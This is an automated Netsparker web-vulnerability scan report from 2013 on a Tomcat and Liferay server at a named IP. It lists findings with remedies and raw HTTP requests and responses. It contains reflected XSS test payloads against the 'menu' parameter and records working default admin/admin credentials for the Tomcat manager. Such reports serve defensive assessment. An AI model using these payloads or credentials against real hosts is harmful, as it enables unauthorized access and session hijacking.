Netsparker Scan Report
Source: sourceforge.net/p/guse/bugs/78/attachment/161.74.91.78_8080.pdf
NETSPARKER SCAN REPORT SUMMARY
TARGET URL http://161.74.91.78:8080/
SCAN DATE 25/01/2013 08:27:47
REPORT DATE 25/01/2013 11:37:48
SCAN DURATION 03:00:42
TOTAL REQUESTS 42874
AVERAGE SPEED 3.95 req/sec.
47 identified
6 confirmed
0 critical
35 informational
SCAN SETTINGS
ENABLED ENGINES: Static Tests, Find Backup Files, SQL Injection, Boolean SQL Injection, Blind SQL Injection, Cross-site Scripting, Command Injection, Blind Command Injection, Local File Inclusion, Remote File Inclusion, Remote Code Evaluation, HTTP Header Injection, Open Redirection, Expression Language Injection
Authentication
Scheduled
VULNERABILITIES (share of identified issues by severity)
IMPORTANT 9 %
MEDIUM 2 %
LOW 15 %
INFORMATION 74 %
VULNERABILITY SUMMARY
URL | Parameter | Method | Vulnerability | Confirmed
/ | | | E-mail Address Disclosure | No
/dci_bridge_service/information | menu | GET | Cross-site Scripting | No
/dci_bridge_service/information | menu | GET | [Possible] Cross-site Scripting | No
/docs | | | Apache Coyote Version Disclosure | No
/docs/appdev/processes.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/building.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/building.html | | | [Possible] Internal Path Leakage (Windows) | No
/docs/class-loader-howto.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/cluster-howto.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/config/cluster-receiver.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/config/cluster-sender.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/config/host.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/config/host.html | | | [Possible] Internal Path Leakage (Windows) | No
/docs/config/http.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/config/listeners.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/html-manager-howto.html | | | [Possible] Internal Path Leakage (Windows) | No
/docs/jasper-howto.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/jndi-datasource-examples-howto.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/logging.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/manager-howto.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/monitoring.html | | | [Possible] Internal IP Address Leakage | No
/docs/monitoring.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/realm-howto.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/RELEASE-NOTES.txt | | | [Possible] Internal Path Leakage (*nix) | No
/docs/security-manager-howto.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/setup.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/ssl-howto.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/virtual-hosting-howto.html | | | [Possible] Internal Path Leakage (*nix) | No
/docs/windows-service-howto.html | | | [Possible] Internal Path Leakage (Windows) | No
/examples/jsp/forward/forward.jsp | | | Internal Server Error | Yes
/examples/jsp/forward/forward.jsp | | | Tomcat Exception Report Disclosure | No
/examples/jsp/index.html | | | Default Tomcat Page Identified | No
/examples/jsp/jsp2/el/basic-arithmetic.jsp | | | Cookie Not Marked As HttpOnly | Yes
/examples/jsp/sessions/carts.jsp | | | [Possible] Internal Path Leakage (*nix) | No
/examples/jsp/sessions/carts.jsp | | | [Possible] Internal Path Leakage (Windows) | No
/examples/servlets/servlet/CookieExample | | | [Possible] Internal Path Leakage (*nix) | No
/examples/servlets/servlet/CookieExample | | | [Possible] Internal Path Leakage (Windows) | No
/examples/servlets/servlet/RequestHeaderExample | | | [Possible] Internal Path Leakage (*nix) | No
/examples/servlets/servlet/SessionExample | | | [Possible] Internal Path Leakage (*nix) | No
/examples/servlets/servlet/SessionExample | | | [Possible] Internal Path Leakage (Windows) | No
/liferay-portal-6.1.0/image/ | | | Forbidden Resource | Yes
/liferay-portal-6.1.0/web/guest/home | | | Password Transmitted Over HTTP | Yes
/liferay-portal-6.1.0/web/guest/home | | | Auto Complete Enabled | Yes
/manager/ | | | Tomcat Version Disclosure | No
/manager/status | | | Basic Authentication over Clear Text | Yes
/manager/status | | | Weak Credentials Identified | No
/RELEASE-NOTES.txt | | | [Possible] Internal Path Leakage (*nix) | No
IMPORTANT (1 total)
1. Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hi-jacking users' active session.
- Mounting phishing attacks.
- Intercept data and perform man-in-the-middle attacks.
Remedy
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, output should be encoded according to the output location and context. For example if the output goes into a JavaScript block within the HTML document then output needs to be encoded accordingly. Encoding can get very complex therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-Cross-site Scripting.
Remedy References: Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet; OWASP AntiSamy Java
External References: XSS Cheat Sheet; OWASP - Cross-site Scripting; XSS Shell; XSS Tunnelling Paper
Classification: OWASP A2, PCI v1.2-6.5.1, PCI v2.0-6.5.7, CWE-79, CAPEC-19, WASC-08
1.1. /dci_bridge_service/information
http://161.74.91.78:8080/dci_bridge_service/information?menu='%3E%3Cnet%20sparker=alert(0x000C36)%3E
Parameters
Parameter | Type | Value
menu | GET | '><net sparker=alert(0x000C36)>
Certainty
Request
GET /dci_bridge_service/information?menu='%3E%3Cnet%20sparker=netsparker(0x000C36)%3E HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/dci_bridge_service/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Cookie: CHAR(109)=
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Fri, 25 Jan 2013 09:42:49 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A7746A61AC33C1B620DE205CDA6AA8ED; Path=/dci_bridge_service
Content-Length: 3550
Content-Type: text/html;charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DCI BRIDGE</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css" media="screen">@import "tabs.css";</style> <style type="text/css" media="screen">@import "style.css";</style> <script language="javascript" src="designe.js"> </script> <script type="text/javascript" src="tinybox.js"></script></head><script> var webapp="/dci_bridge_service"; var popUP_OK=""; var popUP_NO="";</script><body><a href="information?menu=main"><img src="imgs/banner.png" /></a><a href="conf"><img align="right" src="imgs/login.png" /></a><div id="header"> <ul id="primary"> <div id="header"> <ul id="primary"> <li><a href="information?menu=local"><img src="imgs/middlewares/local.png" /><br />Local</a></li> <li><a href="information?menu=glite"><img src="imgs/middlewares/glite.png" /><br />gLite</a></li> <li><a href="information?menu=boinc"><img src="imgs/middlewares/boinc.png" /><br />BOINC</a></li> <li><a href="information?menu=gt2"><img src="imgs/middlewares/gt2.png" /><br />GT-2</a></li> …
IMPORTANT (1 total, 1 confirmed)
2. Basic Authentication over Clear Text
Netsparker identified that the application is using Basic Authentication over HTTP. Basic Authentication sends username and password in plain text.
Impact
If an attacker can intercept traffic on the network, he/she might be able to steal the users' credentials.
Actions to Take
1. See the remedy for solution.
2. Move all of your directories which require authentication to be served only over HTTPS and disable any access to these pages over HTTP.
Remedy
All sensitive data should be transferred only over HTTPS.
Classification: OWASP A9, PCI v1.2-6.5.9, PCI v2.0-6.5.4, CWE-319, CAPEC-65, WASC-04
2.1. /manager/status CONFIRMED
http://161.74.91.78:8080/manager/status
Request
GET /manager/status HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 401 Unauthorized
Cache-Control: no-cache
Date: Fri, 25 Jan 2013 08:27:27 GMT
Pragma: No-cache
Transfer-Encoding: chunked
Server: Apache-Coyote/1.1
WWW-Authenticate: Basic realm="Tomcat Manager Application"
Set-Cookie: JSESSIONID=4ADB5E07C3FFBE7123534CBBDE237E4A; Path=/manager; HttpOnly
Content-Type: text/html
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN…
IMPORTANT (1 total, 1 confirmed)
3. Password Transmitted Over HTTP
Netsparker identified that password data is sent over HTTP.
Impact
If an attacker can intercept network traffic he/she can steal users' credentials.
Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification: OWASP A9, PCI v1.2-6.5.9, PCI v2.0-6.5.4, CWE-319, CAPEC-65, WASC-04
3.1. /liferay-portal-6.1.0/web/guest/home CONFIRMED
http://161.74.91.78:8080/liferay-portal-6.1.0/web/guest/home?p_p_id=58&p_p_lifecycle=0&p_p_state=max..
Form target action
http://161.74.91.78:8080/liferay-portal-6.1.0/web/guest/home?p_auth=BRu3JgId&p_p_id=58&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin&_58_doActionAfterLogin=false
Request
GET /liferay-portal-6.1.0/web/guest/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/liferay-portal-6.1.0/c/portal/login?p_l_id=10231
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Cookie: JSESSIONID=70C60A1A8A9C234A451A8DCB1F4B4F8C; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Fri, 25 Jan 2013 08:32:28 GMT
Server: Apache-Coyote/1.1
Liferay-Portal: Liferay Portal Community Edition 6.1.0 CE (Paton / Build 6100 / January 6, 2012)
ETag: "70403480"
Content-Encoding:
Content-Length: 4840
Content-Type: text/html;charset=UTF-8
<!DOCTYPE html> <html class="ltr" dir="ltr" lang="en-US"> <head> <title>Welcome - Liferay</title> <meta content="text/html; charset=UTF-8" http-equiv="content-type" /> <link href="/liferay-portal-6.1.0/html/themes/classic/images/favicon.ico" rel="Shortcut Icon" /> <link href="http://localhost:8080/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" rel="canonical" /> <link href="http://localhost:8080/ar/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="ar-SA" rel="alternate" /> <link href="http://localhost:8080/eu/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="eu-ES" rel="alternate" /> <link href="http://localhost:8080/bg/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="bg-BG" rel="alternate" /> <link href="http://localhost:8080/ca/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="ca-AD" rel="alternate" /> <link href="http://localhost:8080/ca_ES/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="ca-ES" rel="alternate" /> <link href="http://localhost:8080/zh/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="zh-CN" rel="alternate" /> <l…
IMPORTANT (1 total)
4. Weak Credentials Identified
Netsparker identified a weak username/password in this resource.
Impact
Depending on the nature of the password-protected resource, an attacker can mount one or more of the following types of attacks:
- Access the contents of the password-protected resources.
- Access password-protected administrative mechanisms such as "dashboard", "management console" and "admin panel", potentially progressing to gain full control of the application.
Remedy
Do not use weak passwords which are short, default, common or easy to guess. Implement a strong password policy.
External References: Guide to Authentication
Classification: OWASP A6, PCI v1.2-6.5.8, PCI v2.0-6.5.8, CWE-521, CAPEC-16, WASC-15
4.1. /manager/status
http://161.74.91.78:8080/manager/status
Username: admin
Password: admin
Certainty
Request
GET /manager/status HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate,gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Host: 161.74.91.78:8080
Cookie: JSESSIONID=4ADB5E07C3FFBE7123534CBBDE237E4A
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Fri, 25 Jan 2013 08:27:35 GMT
Pragma: No-cache
Transfer-Encoding: chunked
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CC36BB5DEA0B9E05CB3B1D437C24C812; Path=/manager; HttpOnly
Content-Type: text/html;charset=utf-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<html><head><style>H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;} table { width: 100%; } td.page-title { text-align: center;vertical-align: top; font-family:sans-serif,Tahoma,Arial; font-weight: bold; background: white; color: black; } td.title { text-align: left; vertical-align: top; font-family:sans-serif,Tahoma,Arial; font-style:italic; font-weight: bold; background: #D2A41C; } td.header-left { text-align: left; vertical-align: top; font-family:sans-serif,Tahoma,Arial; font-weight: bold; background: #FFDC75; } td.header-center { text-align: center; vertical-align: top; font-family:sans-serif,Tahoma,Arial; font-weight: bold; background: #FFDC75; }td.row-left { text-align: left; vertical-align: middle; font-family:sans-serif,Tahoma,Arial; color: black; } td.row-center { text-align: center; vertical-align: middle; font-family:sans-serif,Tahoma,Arial; color: black; } td.row-right { text-align: right; vertical-align: middle; font-family:sans-serif,Tahoma,Arial; …
MEDIUM (1 total)
5. [Possible] Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
Netsparker believes that there is a XSS (Cross-site Scripting) in here but it could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hi-jacking users' active session.
- Changing the look of the page within the victim's browser.
- Mounting a successful phishing attack.
- Intercept data and perform man-in-the-middle attacks.
Remedy
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.
There are a number of pre-defined, well structured white-list libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti Cross-site Scripting libraries.
Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet
External References: XSS Cheat Sheet; OWASP - Cross-site Scripting; XSS Shell; XSS Tunnelling Paper
Classification: OWASP A2, PCI v1.2-6.5.1, PCI v2.0-6.5.7, CWE-79, CAPEC-19, WASC-08
5.1. /dci_bridge_service/information
http://161.74.91.78:8080/dci_bridge_service/information?menu='%22--%3E%3C/style%3E%3C/script%3E%3Csc..
Parameters
Parameter | Type | Value
menu | GET | '"--></style></script><script>alert(0x000BFD)</script>
Certainty
Request
GET /dci_bridge_service/information?menu='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000BFD)%3C/script%3E HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/dci_bridge_service/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Cookie: CHAR(109)=
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Fri, 25 Jan 2013 09:39:29 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B49E5F7DF0937D7D9AA7DDD5F1F7DE68; Path=/dci_bridge_service
Content-Length: 3596
Content-Type: text/html;charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DCI BRIDGE</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css" media="screen">@import "tabs.css";</style> <style type="text/css" media="screen">@import "style.css";</style> <script language="javascript" src="designe.js"> </script> <script type="text/javascript" src="tinybox.js"></script></head><script> var webapp="/dci_bridge_service"; var popUP_OK=""; var popUP_NO="";</script><body><a href="information?menu=main"><img src="imgs/banner.png" /></a><a href="conf"><img align="right" src="imgs/login.png" /></a><div id="header"> <ul id="primary"> <div id="header"> <ul id="primary"> <li><a href="information?menu=local"><img src="imgs/middlewares/local.png" /><br />Local</a></li> <li><a href="information?menu=glite"><img src="imgs/middlewares/glite.png" /><br />gLite</a></li> <li><a href="information?menu=boinc"><img src="imgs/middlewares/boinc.png" /><br />BOINC</a></li> <li><a href="information?menu=gt2"><img src="imgs/middlewares/gt2.png" /><br />GT-2</a></li> …
LOW (1 total, 1 confirmed)
6. Internal Server Error
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.
Impact
The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.
Remedy
Analyse this issue and review the application code in order to handle unexpected errors; this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
6.1. /examples/jsp/forward/forward.jsp CONFIRMED
http://161.74.91.78:8080/examples/jsp/forward/forward.jsp
Request
GET /examples/jsp/forward/forward.jsp HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/examples/jsp/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Cookie: JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 25 Jan 2013 08:28:05 GMT
Server: Apache-Coyote/1.1
Content-Length: 2699
Content-Type: text/html;charset=utf-8
<html><head><title>Apache Tomcat/6.0.35 - Error repor…
LOW (1 total, 1 confirmed)
7. Auto Complete Enabled
"AutoComplete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".
Impact
Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.
Remedy
Add the attribute autocomplete="off" to the form tag or to individual "input" fields.
Actions to Take
1. See the remedy for the solution.
2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.
Required Skills for Successful Exploitation
Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.
External References: Using AutoComplete in HTML Forms
Classification: CWE-16, WASC-15
7.1. /liferay-portal-6.1.0/web/guest/home CONFIRMED
http://161.74.91.78:8080/liferay-portal-6.1.0/web/guest/home?p_p_id=58&p_p_lifecycle=0&p_p_state=max..
Identified Field Name: _58_login
Request
GET /liferay-portal-6.1.0/web/guest/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/liferay-portal-6.1.0/c/portal/login?p_l_id=10231
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Cookie: JSESSIONID=70C60A1A8A9C234A451A8DCB1F4B4F8C; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Fri, 25 Jan 2013 08:32:28 GMT
Server: Apache-Coyote/1.1
Liferay-Portal: Liferay Portal Community Edition 6.1.0 CE (Paton / Build 6100 / January 6, 2012)
ETag: "70403480"
Content-Encoding:
Content-Length: 4840
Content-Type: text/html;charset=UTF-8
<!DOCTYPE html> <html class="ltr" dir="ltr" lang="en-US"> <head> <title>Welcome - Liferay</title> <meta content="text/html; charset=UTF-8" http-equiv="content-type" /> <link href="/liferay-portal-6.1.0/html/themes/classic/images/favicon.ico" rel="Shortcut Icon" /> <link href="http://localhost:8080/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" rel="canonical" /> <link href="http://localhost:8080/ar/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="ar-SA" rel="alternate" /> <link href="http://localhost:8080/eu/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="eu-ES" rel="alternate" /> <link href="http://localhost:8080/bg/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="bg-BG" rel="alternate" /> <link href="http://localhost:8080/ca/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="ca-AD" rel="alternate" /> <link href="http://localhost:8080/ca_ES/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="ca-ES" rel="alternate" /> <link href="http://localhost:8080/zh/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="zh-CN" rel="alternate" /> <l…
LOW (1 total, 1 confirmed)
8. Cookie Not Marked As HttpOnly
Cookie was not marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks.
Impact
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.
Actions to Take
1. See the remedy for solution.
2. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)
Remedy
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
External References: OWASP HTTPOnly Cookies; MSDN - ASP.NET HTTPOnly Cookies
Classification: CWE-16, CAPEC-107, WASC-15
8.1. /examples/jsp/jsp2/el/basic-arithmetic.jsp CONFIRMED
http://161.74.91.78:8080/examples/jsp/jsp2/el/basic-arithmetic.jsp
Identified Cookie: JSESSIONID
Request
GET /examples/jsp/jsp2/el/basic-arithmetic.jsp HTTP/1.1
Cache-Control: no-cache
Referer: http://161.74.91.78:8080/examples/jsp/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Fri, 25 Jan 2013 08:27:40 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784; Path=/examples
Content-Length: 2152
Content-Type: text/html
<!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with thi…
LOW (1 total)
9. Tomcat Version Disclosure
Netsparker identified that the target web server is disclosing the Tomcat version in its HTTP response. This information might help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Tomcat.
Impact
An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.
Remedy
Configure your web server to prevent information leakage from the X-Powered-By header of its HTTP response.
Remedy References: OWASP Securing Tomcat
Classification: OWASP A6, PCI v1.2-6.5.6, CWE-200, CAPEC-170
9.1. /manager/
http://161.74.91.78:8080/manager/
Extracted Version: 6.0.35
Certainty
Request
GET /manager/ HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Accept-Language: en-us,en;q=0.5
Host: 161.74.91.78:8080
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 404 Not Found
Date: Fri, 25 Jan 2013 08:27:27 GMT
Server: Apache-Coyote/1.1
Content-Length: 979
Content-Type: text/html;charset=utf-8
<html><head><title>Apache Tomcat/6.0.35 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} A {color : black;} A.name {color : black;} HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /manager/</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/manager/</u></p><p><b>description</b> <u>The requested resource (/manager/) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.35</h3></body></html>
LOW (1 total)
10. Apache Coyote Version Disclosure
Netsparker identified that the target web server is disclosing the Apache Coyote version in its HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially to develop further attacks targeted at the specific version of Apache.
Impact
An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.
Remedy
Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
Classification: OWASP A6, CWE-200, CAPEC-170, WASC-45
10.1. /docs
